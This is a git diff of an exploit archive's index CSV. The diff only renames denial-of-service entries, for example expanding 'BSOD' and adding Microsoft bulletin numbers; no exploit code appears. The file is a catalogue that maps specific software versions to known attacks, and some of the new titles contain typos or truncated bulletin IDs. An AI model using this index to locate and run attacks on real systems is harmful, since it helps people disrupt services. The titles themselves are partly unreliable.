diff --git a/files.csv b/files.csv index 4179a1f3e..b5d2ac495 100755 --- a/files.csv +++ b/files.csv @@ -16,7 +16,7 @@ id,file,description,date,author,platform,type,port 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 -113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0 @@ -28,7 +28,7 @@ id,file,description,date,author,platform,type,port 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos,0 -214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 +214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)",2000-12-02,phonix,windows,dos,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 236,platforms/linux/dos/236.sh,"RedHat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 @@ -162,7 +162,7 @@ id,file,description,date,author,platform,type,port 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 -948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0 +948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos,0 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 @@ -215,7 +215,7 @@ id,file,description,date,author,platform,type,port 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 -1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 +1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 @@ -299,9 +299,9 @@ id,file,description,date,author,platform,type,port 1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0 1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 -1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 +1599,platforms/windows/dos/1599.cpp,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 -1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 +1603,platforms/windows/dos/1603.c,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 @@ -816,7 +816,7 @@ id,file,description,date,author,platform,type,port 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0 -6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 +6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 @@ -1148,7 +1148,7 @@ id,file,description,date,author,platform,type,port 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos,0 9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0 -9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' BSOD Crash",2009-08-11,webDEViL,windows,dos,0 +9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 @@ -1181,7 +1181,7 @@ id,file,description,date,author,platform,type,port 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)",2009-09-03,"expose 0day",windows,dos,0 9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)",2009-09-03,"expose 0day",windows,dos,0 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 -9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD",2009-09-09,"laurent gaffie",windows,dos,0 +9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0 9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 @@ -1235,7 +1235,7 @@ id,file,description,date,author,platform,type,port 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 -10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)",2009-11-12,"H D Moore",windows,dos,0 +10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 @@ -1461,7 +1461,7 @@ id,file,description,date,author,platform,type,port 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 -12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0 +12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,windows,dos,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0 @@ -1498,7 +1498,7 @@ id,file,description,date,author,platform,type,port 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 -12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 +12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 @@ -1510,7 +1510,7 @@ id,file,description,date,author,platform,type,port 12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 -12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 +12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0 12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 @@ -1655,7 +1655,7 @@ id,file,description,date,author,platform,type,port 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0 14607,platforms/windows/dos/14607.py,"Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0 14608,platforms/windows/dos/14608.txt,"Microsoft Windows - CreateWindow Function Callback (MS10-048)",2010-08-10,"Core Security",windows,dos,0 -14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 +14609,platforms/windows/dos/14609.py,"Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14613,platforms/windows/dos/14613.py,"Microsoft Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 @@ -1724,7 +1724,7 @@ id,file,description,date,author,platform,type,port 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename' init() .bss (PoC)",2010-09-20,Stoke,linux,dos,0 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 -15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0 +15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)",2010-09-26,Abysssec,windows,dos,0 15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,multiple,dos,0 15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,windows,dos,0 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0 @@ -1733,7 +1733,7 @@ id,file,description,date,author,platform,type,port 15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,windows,dos,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 -15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 +15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,windows,dos,0 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,ios,dos,0 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 @@ -1752,7 +1752,7 @@ id,file,description,date,author,platform,type,port 15259,platforms/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 -15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 +15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 @@ -1905,7 +1905,7 @@ id,file,description,date,author,platform,type,port 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0 -16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (Metasploit)",2010-08-30,Metasploit,windows,dos,0 +16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0 @@ -1952,7 +1952,7 @@ id,file,description,date,author,platform,type,port 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 -17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)",2011-04-29,webDEViL,windows,dos,0 +17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,windows,dos,0 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences",2011-05-12,"Stefan LE BERRE",windows,dos,0 @@ -1972,7 +1972,7 @@ id,file,description,date,author,platform,type,port 17398,platforms/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0 17399,platforms/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 - Local Denial of Service (PoC)",2011-06-14,"Arturo D'Elia",linux,dos,0 -17401,platforms/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service",2011-06-14,"Core Security",windows,dos,0 +17401,platforms/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service (MS11-047)",2011-06-14,"Core Security",windows,dos,0 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",windows,dos,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 @@ -2009,14 +2009,14 @@ id,file,description,date,author,platform,type,port 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)",2011-09-05,"BSOD Digital",windows,dos,0 -17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 +17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0 21785,platforms/windows/dos/21785.pl,"HCView - WriteAV Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 -17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 -17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 +17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)",2011-09-13,"Luigi Auriemma",windows,dos,0 +17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)",2011-09-13,"Core Security",windows,dos,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos,0 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -2056,7 +2056,7 @@ id,file,description,date,author,platform,type,port 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0 -18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 +18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 @@ -2073,7 +2073,7 @@ id,file,description,date,author,platform,type,port 18112,platforms/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0 -18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 +18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0 18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 @@ -2094,7 +2094,7 @@ id,file,description,date,author,platform,type,port 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media 